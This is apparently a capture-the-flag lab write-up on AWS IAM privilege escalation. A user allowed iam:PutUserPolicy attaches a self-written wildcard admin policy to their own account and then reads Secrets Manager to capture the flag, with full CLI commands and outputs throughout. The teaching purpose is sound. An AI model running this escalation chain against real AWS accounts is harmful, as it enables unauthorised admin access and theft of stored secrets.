This lab doesn’t return a username so we need to know who we’re dealing with:
aws sts get-caller-identity
{
"UserId": "AIDA5M7PA4Z5WKVCORA3B",
"Account": "921234892411",
"Arn": "arn:aws:iam::921234892411:user/iam-putuserpolicy-privesc-1703011154436-SeniorDev"
}
Code language: JavaScript (javascript)
Now that we have our username, we’re ready to do some further enumeration:
aws iam get-user --user-name iam-putuserpolicy-privesc-1703011154436-SeniorDev
{
"User": {
"Path": "/",
"UserName": "iam-putuserpolicy-privesc-1703011154436-SeniorDev",
"UserId": "AIDA5M7PA4Z5WKVCORA3B",
"Arn": "arn:aws:iam::921234892411:user/iam-putuserpolicy-privesc-1703011154436-SeniorDev",
"CreateDate": "2023-12-19T18:39:38+00:00",
"PermissionsBoundary": {
"PermissionsBoundaryType": "Policy",
"PermissionsBoundaryArn": "arn:aws:iam::921234892411:policy/BoundaryPolicy"
},
"Tags": [
{
"Key": "cybr-lab",
"Value": "auto-deployed"
}
]
}
}
Code language: JavaScript (javascript)
As we can see, this user does have a permission boundary applied, but we’re not going to have permissions to view the boundary policy, so I’ll save you the effort.
aws iam get-policy --policy-arn arn:aws:iam::272281913033:policy/BoundaryPolicy
{
"Policy": {
"PolicyName": "BoundaryPolicy",
"PolicyId": "ANPA5M7PA4Z5TU6CPGILZ",
"Arn": "arn:aws:iam::921234892411:policy/BoundaryPolicy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 0,
"PermissionsBoundaryUsageCount": 1,
"IsAttachable": true,
"Description": "Managed policy to act as a permission boundary.",
"CreateDate": "2023-12-17T18:31:06+00:00",
"UpdateDate": "2023-12-17T18:31:06+00:00",
"Tags": []
}
}
Code language: JavaScript (javascript)
Let’s try to enumerate what permissions we do have.
aws iam list-user-policies --user-name iam-putuserpolicy-privesc-1703011154436-SeniorDev
{
"PolicyNames": [
"iam-putuserpolicy-privesc-1703011154436-senior-manager"
]
}
Code language: PHP (php)
Now retrieve the policy document itself:
aws iam get-user-policy --user-name iam-putuserpolicy-privesc-1703011154436-SeniorDev --policy-name iam-putuserpolicy-privesc-1703011154436-senior-manager
{
"UserName": "iam-putuserpolicy-privesc-1703011154436-SeniorDev",
"PolicyName": "iam-putuserpolicy-privesc-1703011154436-senior-manager",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"iam:PutUserPolicy"
],
"Resource": [
"arn:aws:iam::921234892411:user/*"
],
"Effect": "Allow"
}
]
}
}
Code language: JavaScript (javascript)
We see one allowed action:
"Action": [
"iam:PutUserPolicy"
],
Code language: JavaScript (javascript)
And it’s set for the resource:
"Resource": [
"arn:aws:iam::921234892411:user/*"
],
Code language: JavaScript (javascript)
From the prior labs, we already know the potential dangerous of this, but we’re not familiar with PutUserPolicy
yet. Let’s pull up some documentation:
PutUserPolicy
can be used to add or update inline IAM policy documents for an IAM user. So this is very similar to AttachUSerPolicy
except that you can create any policy document that you want! You are not restricted to only using AWS-managed or Customer-managed policy documents available in this AWS account! That makes this command even more potentially dangerous, as you’re about to see.
As per the CLI documentation, here’s how we issue the command:
put-user-policy
--user-name <value>
--policy-name <value>
--policy-document <value>
...
Code language: HTML, XML (xml)
We specify the user we want to add an inline policy to, we give the policy a name (it can be anything so long as it fits AWS’ naming requirements), and a policy document which is a JSON file.
Let’s create a policy document:
vim policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
Code language: JavaScript (javascript)
(I use vim but if you’re not comfortable with vim you can use any text editor of your choice)
Now use PutUserPolicy
:
aws iam put-user-policy --user-name iam-putuserpolicy-privesc-1703011154436-SeniorDev --policy-name test --policy-document file://policy.json
Code language: JavaScript (javascript)
We can now re-run list-user-policies
:
aws iam list-user-policies --user-name iam-putuserpolicy-privesc-1703011154436-SeniorDev
{
"PolicyNames": [
"iam-putuserpolicy-privesc-1703011154436-senior-manager",
"test"
]
}
Code language: PHP (php)
And we’ll see our test
policy that we just uploaded!
If we get-user-policy
we will see the document we uploaded:
aws iam get-user-policy --user-name iam-putuserpolicy-privesc-1703011154436-SeniorDev --policy-name test
{
"UserName": "iam-putuserpolicy-privesc-1703011154436-SeniorDev",
"PolicyName": "test",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
}
Code language: JavaScript (javascript)
Note: even though the policy you’re uploading grants admin privileges, we don’t allow admin privileges in our lab environments for security purposes and to protect our labs platform. That’s why you only have access to Secrets Manager (as you’re about to see) and the prior permissions you had at the start of the lab. However, if the AWS environment isn’t properly secured, then using the policy above would grant you admin privileges with this exploit!
Let’s see if we’re now able to access Secrets Manager:
aws secretsmanager list-secrets
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:921234892411:secret:iam-putuserpolicy-privesc-1703011154436-final_flag-QHaVe6",
"Name": "iam-putuserpolicy-privesc-1703011154436-final_flag",
"Description": "Secret containing a flag",
...REDACTED...
Code language: PHP (php)
That worked! We definitely did not have SecretsManager access at the beginning of the lab, so we’ve successfully elevated privileges for our user.
Let’s capture the flag!
aws secretsmanager get-secret-value --secret-id <redacted>final_flag
{
"ARN": "arn:aws:secretsmanager:us-east-1:921234892411:secret:<redacted>flag-QHaVe6",
"Name": "<redacted>final_flag",
"VersionId": "6084ba1d-4708-a7dd-d673-f5af2f8a2f3d",
"SecretString": "{\\"vault-password\\": \\"<redacted>\\"}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2023-12-19T11:39:18.626000-07:00"
}
Code language: JavaScript (javascript)
Congrats! You’ve captured the flag using the dangerous PutUserPolicy
exploit! Go ahead and copy/paste it and submit it as the flag!
Responses